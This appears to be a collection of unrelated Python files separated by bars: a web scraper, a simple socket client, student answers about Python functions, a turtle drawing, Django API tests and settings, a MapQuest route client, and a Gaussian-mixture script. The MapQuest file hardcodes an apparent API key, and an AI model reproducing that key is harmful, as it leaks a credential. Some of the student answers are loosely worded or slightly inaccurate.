rootPath = os.path.split( curPath )[0]
sys.path.append ( rootPath )
# print ( sys.path )
url = 'http://ptj-test.uyess.com/'
r = requests.get(url)
# print(r.text)
# Snapshot the page so parse_data() can work offline.
# NOTE(review): the file is written with gbk encoding -- confirm the site
# actually serves gbk, otherwise non-ASCII characters will be mangled.
with open('index.html', mode='w', encoding='gbk') as f:
    f.write(r.text)
def parse_data():
    """Parse the previously saved index.html and print its <meta> tags."""
    with open('index.html', mode='r', encoding='gbk') as f:
        html = f.read()
    # Create a BeautifulSoup instance to parse the html data,
    # using the built-in "html.parser" parser
    bs = BeautifulSoup(html, 'html.parser')
    # Looking up data:
    # 1. find(): returns the first matching tag
    # div = bs.find('div')
    # print(div)
    # print(type(div)) # Tag type
    # 2. find_all(): returns every matching tag
    metas = bs.find_all('meta') # returns a collection
    print(metas)
    # print(bs.find_all(id='hello')) # look up by id, returns a collection
    # print(bs.find_all(class_='itany')) # look up by class
    # 3. select(): fetch elements with CSS selectors
    # print(bs.select('#hello'))
    # print(bs.select('.itany'))
    # print(bs.select('p#world span'))
    # print(bs.select('[title]'))
    # 4. get_text(): return the text inside a Tag
    # value = bs.select('#hello')[0].get_text()
    # # print(len(value))
    # print(value)
# client = requests.session()
# client.get(url)
# if '_csrf' in client.cookies:
# csrftoken = client.cookies['_csrf']
# else:
# csrftoken = client.cookies['_csrf']
# print (csrftoken)
|
import sys,os
from socket import *
# Require host and port on the command line; bail out otherwise.
if(len(sys.argv)>2):
    host=sys.argv[1]
    port=int(sys.argv[2])
else:
    print("Required Parameters not found. You should provide host and port to create socket connection")
    sys.exit(1)
# Resolve the host name once, then open a TCP connection to it.
server_address=gethostbyname(host)
connection_socket=socket(AF_INET,SOCK_STREAM)
connection_socket.connect((server_address,port))
# Wrap the socket in file-like objects for line-oriented text I/O.
incoming_stream = connection_socket.makefile("r")
outgoing_stream = connection_socket.makefile("w")
# Read until the server closes its side, then release all handles.
print(incoming_stream.read())
incoming_stream.close()
outgoing_stream.close()
connection_socket.close()
|
#!/usr/bin/env python
# coding: utf-8
# # Assignment 3
# In[ ]:
# 1. Why are functions advantageous to have in your programs?
# solu:
# The major advantage of functions is reusability: we can call a function any number of times in a program, which avoids rewriting the code that performs the same operation.
# 2. When does the code in a function run: when it's specified or when it's called?
# solu:
# The code in the function run only when it is called .
# 3. What statement creates a function?
# solu:
# defining the function takes place when we make use of the "def" statement followed by function name and parameters in between the ()parenthesis .It should pass the same number of parameters when it is calling the function has it has defined in its parameters while initialising. Like example below ,
#
# def funcName(a,b):
#
# #statement
#
# funcName(a,b)
# 4. What is the difference between a function and a function call?
# solu:
# function is a separate part of the program which has a particular task need to be completed when it is called . Function call is something which calls the function to come and complete the task/work being assigned to it whenever and where-ever required after being called by the function call .
# 5. How many global scopes are there in a Python program? How many local scopes?
# solu:
# Basically there are two types : Global scopes and Local scope.
# Global scope : It is declared at the beginning/outside of the function/constructor/method because of which it can be accessed from any where in the program.It allocates the memory for them at the beginning of the program itself.
#
# Local scope : It is declared inside the method /function/constructor becaus of which it can be accessed inside only the particular method in which it was declared .It allocates the memory only when the function/constructor/method is called or in use.
#
# if both the variables in global and local have same name then first it will check for local variable if not present them it will take the global variable only when it has same name as of local variable.
#
#
# 6. What happens to variables in a local scope when the function call returns?
# solu:
# when the function call returns then the local scope destroy the memory after the execution .
# 7. What is the concept of a return value? Is it possible to have a return value in an expression?
# solu:
# Return value is mostly used in functions/methods.
# The concept of return value is to send the result of a function / method back to the callers statement of the function/method.
# If the defined function has explicit return statement then Yes we can have a return value in expression.
#
# 8. If a function does not have a return statement, what is the return value of a call to that function?
# solu:
# In such case of function does not have a return statement it will simply return a NONE value .
# 9. How do you make a function variable refer to the global variable?
# solu:
# By using the Global keyword we can make a function variable refer to a global variable but the names of both the variables should be same.
# 10. What is the data type of None?
# solu:
# None has its own unique data type, called "NoneType".
# 11. What does the sentence import areallyourpetsnamederic do?
# solu:
# It imports the module naming areallyourpetsnamederic if it exists.
# 12. If you had a bacon() feature in a spam module, what would you call it after importing spam
# solu:
# step-1: Import spam
# step-2: spam.bacon()
# 13. What can you do to save a programme from crashing if it encounters an error?
# Solu:
# By handling the expected errors by implementing try and catch method to handle the exceptions.
# 14. What is the purpose of the try clause? What is the purpose of the except clause?
# solu:
# The try-except clause handles runtime exceptions. The try clause contains the code that might raise an exception; when an exception occurs, control passes to the except clause, which informs the programmer of the exception that occurred and allows it to be handled.
|
from turtle import *
# Set up the drawing canvas.
screen = Screen()
screen.bgcolor("green")
# Configure the turtle pen: yellow, 2px lines, fastest animation speed.
bob = Turtle()
bob.color("yellow")
bob.pensize(2)
bob.speed(0)
bob.shape("turtle")
# Draw 10 zig-zag spokes: step out, turn, step back, turn again.
for x in range(10):
    bob.forward(15)
    bob.left(10)
    bob.backward(15)
    bob.left(10)
# Keep the window open until the user closes it.
mainloop()
|
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from app.models import City, Location, State
from app.serializers import CitySerializer, LocationSerializer, StateSerializer
class CityApiTestCase(APITestCase):
    """Read-only API tests for the City endpoints."""

    @classmethod
    def setUpTestData(cls):
        cls.city_1 = City.objects.create(name='Москва')
        cls.city_2 = City.objects.create(name='Санкт-Петербург')

    def test_get(self):
        """A single city is returned serialized with HTTP 200."""
        url = reverse('city-detail', kwargs={'pk': self.city_1.id})
        serialized_data = CitySerializer(self.city_1).data
        response = self.client.get(url)
        self.assertEqual(status.HTTP_200_OK, response.status_code)
        self.assertEqual(serialized_data, response.data)

    def test_get_nonexistent(self):
        """Requesting a pk with no City yields HTTP 404."""
        missing_pk = 3  # renamed from `id` to avoid shadowing the builtin
        url = reverse('city-detail', kwargs={'pk': missing_pk})
        response = self.client.get(url)
        self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)

    def test_get_list(self):
        """The list endpoint returns both fixtures serialized."""
        url = reverse('city-list')
        serialized_data = CitySerializer([self.city_1, self.city_2], many=True).data
        response = self.client.get(url)
        self.assertEqual(status.HTTP_200_OK, response.status_code)
        self.assertEqual(serialized_data, response.data)
class LocationApiTestCase(APITestCase):
    """Read-only API tests for the Location endpoints."""

    @classmethod
    def setUpTestData(cls):
        city = City.objects.create(name='Москва')
        cls.location_1 = Location.objects.create(city=city, street='ул. Тверская', support=1)
        cls.location_2 = Location.objects.create(city=city, street='ул. Тверская', support=2)

    def test_get(self):
        """A single location is returned serialized with HTTP 200."""
        url = reverse('location-detail', kwargs={'pk': self.location_1.id})
        serialized_data = LocationSerializer(self.location_1).data
        response = self.client.get(url)
        self.assertEqual(status.HTTP_200_OK, response.status_code)
        self.assertEqual(serialized_data, response.data)

    def test_get_nonexistent(self):
        """Requesting a pk with no Location yields HTTP 404."""
        missing_pk = 3  # renamed from `id` to avoid shadowing the builtin
        url = reverse('location-detail', kwargs={'pk': missing_pk})
        response = self.client.get(url)
        self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)

    def test_get_list(self):
        """The list endpoint returns both fixtures serialized."""
        url = reverse('location-list')
        serialized_data = LocationSerializer([self.location_1, self.location_2], many=True).data
        response = self.client.get(url)
        self.assertEqual(status.HTTP_200_OK, response.status_code)
        self.assertEqual(serialized_data, response.data)
class StateApiTestCase(APITestCase):
    """Read-only API tests for the State endpoints."""

    @classmethod
    def setUpTestData(cls):
        cls.state_1 = State.objects.create(state=0, logs='Test logs')
        cls.state_2 = State.objects.create(state=1, logs='Test logs')

    def test_get(self):
        """A single state is returned serialized with HTTP 200."""
        url = reverse('state-detail', kwargs={'pk': self.state_1.id})
        serialized_data = StateSerializer(self.state_1).data
        response = self.client.get(url)
        self.assertEqual(status.HTTP_200_OK, response.status_code)
        self.assertEqual(serialized_data, response.data)

    def test_get_nonexistent(self):
        """Requesting a pk with no State yields HTTP 404."""
        missing_pk = 3  # renamed from `id` to avoid shadowing the builtin
        url = reverse('state-detail', kwargs={'pk': missing_pk})
        response = self.client.get(url)
        self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)

    def test_get_list(self):
        """The list endpoint returns both fixtures serialized."""
        url = reverse('state-list')
        serialized_data = StateSerializer([self.state_1, self.state_2], many=True).data
        response = self.client.get(url)
        self.assertEqual(status.HTTP_200_OK, response.status_code)
        self.assertEqual(serialized_data, response.data)
|
from django.conf import settings
from django.contrib.auth.models import User
from todo.models import List
STAFF_ONLY = getattr(settings, 'TODO_STAFF_ONLY', False)

# Query the database for fallbacks only when the corresponding setting is
# absent. The original module hit the DB unconditionally at import time and
# crashed (IndexError / AttributeError) when no superuser or list existed.
DEFAULT_ASSIGNEE = getattr(settings, 'TODO_DEFAULT_ASSIGNEE', None)
if DEFAULT_ASSIGNEE is None:
    first_superuser = User.objects.filter(is_superuser=True).first()
    DEFAULT_ASSIGNEE = first_superuser.username if first_superuser else None

DEFAULT_LIST_ID = getattr(settings, 'TODO_DEFAULT_LIST_ID', None)
if DEFAULT_LIST_ID is None:
    first_list = List.objects.first()
    DEFAULT_LIST_ID = first_list.id if first_list else None

PUBLIC_SUBMIT_REDIRECT = getattr(settings, 'TODO_PUBLIC_SUBMIT_REDIRECT', '/')
|
import json
import urllib.parse
import urllib.request
import socket
MAPQUEST_API_KEY = 'n1VVYuFNFcNEGPdRBheFtlUjEPLiQmsn'
BASE_URL = 'http://open.mapquestapi.com/directions/v2/'
BASE_URL2 = 'http://open.mapquestapi.com/elevation/v1/'
def build_search_url(src: str, dest: 'list[str]') -> str:
    """Build a MapQuest directions-API URL for a route with stops.

    :param src: starting location
    :param dest: ordered destinations, each added as a ``to`` parameter
    :return: full request URL for the directions API
    """
    # (Fixed annotation: the original `dest: [str]` was a list literal,
    # not a valid type hint.)
    query_parameters = [
        ('key', MAPQUEST_API_KEY), ('from', src)]
    for destination in dest:
        query_parameters.append(('to', destination))
    return BASE_URL + '/route?' + urllib.parse.urlencode(query_parameters)
def get_result(url: str) -> dict:
    """Download *url* and decode its JSON payload.

    :param url: URL to fetch
    :return: parsed JSON body as a dict
    """
    # The with-statement closes the response on all paths, matching the
    # original try/finally cleanup.
    with urllib.request.urlopen(url) as response:
        json_text = response.read().decode(encoding = 'utf-8')
    return json.loads(json_text)
def build_elevation_url(result: dict) -> str:
    """Build a MapQuest elevation-profile URL from a directions result.

    The elevation API can reuse the already-computed route through its
    ``sessionId``, so the full latitude/longitude collection does not need
    to be re-sent (the dead latLngCollection code and the leftover debug
    print were removed).

    :param result: parsed JSON response from the directions API
    :return: full request URL for the elevation API
    """
    query_parameters = [('key', MAPQUEST_API_KEY),
                        ('sessionId', result['route']['sessionId'])]
    return BASE_URL2 + '/profile?' + urllib.parse.urlencode(query_parameters)
def refine(result: dict, result2: dict) -> dict:
    """Condense MapQuest route and elevation responses into a flat summary.

    :param result: parsed JSON response from the directions API
    :param result2: parsed JSON response from the elevation API
    :return: dict with keys 'Steps' (narratives), 'TotalDistance' (int),
        'TotalTime' (int), 'LatLong' ((lat, lng) tuples) and
        'Elevation' (heights)
    """
    # Initialize with real empty values (the original used the type objects
    # `int` as placeholders for TotalDistance/TotalTime).
    to_return = {'Steps': [], 'TotalDistance': 0, 'TotalTime': 0,
                 'LatLong': [], 'Elevation': []}
    for leg in result['route']['legs']:
        for maneuver in leg['maneuvers']:
            to_return['Steps'].append(maneuver['narrative'])
    to_return['TotalDistance'] = int(result['route']['distance'])
    to_return['TotalTime'] = int(result['route']['time'])
    for location in result['route']['locations']:
        lat_lng = location['latLng']
        to_return['LatLong'].append((lat_lng['lat'], lat_lng['lng']))
    for point in result2['elevationProfile']:
        to_return['Elevation'].append(point['height'])
    return to_return
|
# -*- coding: utf-8 -*-
"""
Created on Fri May 25 18:53:12 2018
@author: Consiousflow
"""
import numpy as np
import os
import math
from sklearn import mixture
import matplotlib.pyplot as plt
from pylab import *
from scipy import stats
# Directories holding the .npy embedding files for the two classes.
path_av = "D:/Downloads/Cache/Desktop/Temp/embedding/AV/"
path_bv = "D:/Downloads/Cache/Desktop/Temp/embedding/BV/"
names_av = os.listdir(path_av)
names_bv = os.listdir(path_bv)
i = 1
# Stack every embedding (flattened to 1x262144) into one observation matrix.
obs = np.zeros((0,262144))
for name in names_av:
    av = np.load(path_av+name).reshape((1,262144))
    obs = np.append(obs,av,axis=0)
    print(obs.shape)
    i = i+1
for name in names_bv:
    bv = np.load(path_bv+name).reshape((1,262144))
    obs = np.append(obs,bv,axis=0)
    print(obs.shape)
    i = i+1
# Fit a 3-component Gaussian mixture and score the training observations.
# NOTE(review): mixture.GMM is the pre-0.18 scikit-learn API; modern releases
# removed it in favor of mixture.GaussianMixture -- confirm the pinned version.
clf = mixture.GMM(n_components=3)
clf.fit(obs)
p = clf.score(obs)
print(p)
#for i in range(len(p)):
#    p[i] = math.pow(2,p[i])
#print(p)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.